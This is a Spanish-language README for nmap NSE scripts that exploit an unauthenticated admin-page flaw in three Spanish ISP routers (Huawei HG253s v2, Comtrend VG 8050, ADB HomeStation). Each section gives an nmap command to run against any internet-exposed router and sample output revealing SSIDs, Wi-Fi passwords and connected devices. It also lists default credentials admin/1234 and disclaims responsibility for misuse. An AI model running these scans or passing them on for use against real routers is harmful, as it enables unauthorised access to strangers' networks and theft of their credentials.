
Algunos scripts NSE para buscar información de routers
Algunos scripts NSE para buscar información de routers.
El autor de estos scripts es VicenDominguez. Él encontró el 0-Day en Huawei; yo solo lo modifiqué para otros dos.
El autor de este script no es responsable de su uso.
#Huawei HG253s v2 Vodafone-España está empezando a alquilar un nuevo router Huawei HG253v2 a los clientes españoles. Este nuevo router viene con una nueva versión de firmware.
##Vulnerabilidad Básicamente, no valida la cookie de sesión en algunas páginas web de administración. Por lo tanto, es posible obtener información directa de esas URLs en cualquier router abierto a Internet.
##Uso
nmap --script=http-enum-vodafone-hua253s.nse -p80,443 -sS x.x.x.x
Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum-vodafone-hua253s:
| SSID: vodafone070 (14:b9:XX:XX:XX:XX) Password: (AES) 123456
| Device: android-246e67b281179679-Wireless MAC: 48:5A:3F:XX:XX:XX IP: 192.168.0.XX
#Comtrend VG 8050 Telefónica-España está empezando a alquilar un nuevo router Comtrend VG 8050 a los clientes españoles. Este nuevo router viene con una nueva versión de firmware. Este bug ha sido encontrado por DaniLabs
##Vulnerabilidad Básicamente, no valida la cookie de sesión en algunas páginas web de administración. Por lo tanto, es posible obtener información directa de esas URLs en cualquier router abierto a Internet.
##Uso
nmap --script=http-enum-telefonica-comtrend-vg-8050.nse -p80,443 -sS x.x.x.x
Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum-telefonica-comtrend-vg-8050:
| SSID: MOVISTAR_XXX
| Cipher Algorithm: WPA
| Password WEP:
| Password WPA: gTU3NkXE44RYjuM2RrxM
| Password WPA2:
| Device: 192.168.0.X MAC: 5c:97:X:X:X:X IP: 192.168.0.X
#ADB P.DGA4001N también conocido como HomeStation Telefónica-España está empezando a alquilar un nuevo router ADB P.DGA4001N a los clientes españoles. Este nuevo router viene con una nueva versión de firmware. Este bug ha sido encontrado por DaniLabs
##Vulnerabilidad Básicamente, no valida la cookie de sesión en algunas páginas web de administración. Por lo tanto, es posible obtener información directa de esas URLs en cualquier router abierto a Internet.
Las credenciales por defecto son admin / 1234 ##Uso
nmap --script=http-enum-telefonica-homestation.nse -p80,443 -sS x.x.x.x
Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum-telefonica-homestation:
| SSID: WLAN_HOME
| Cipher Algorithm: WEP
| Device: IphonePedro MAC: A8:8E:24:X:X:X IP: 192.168.1.X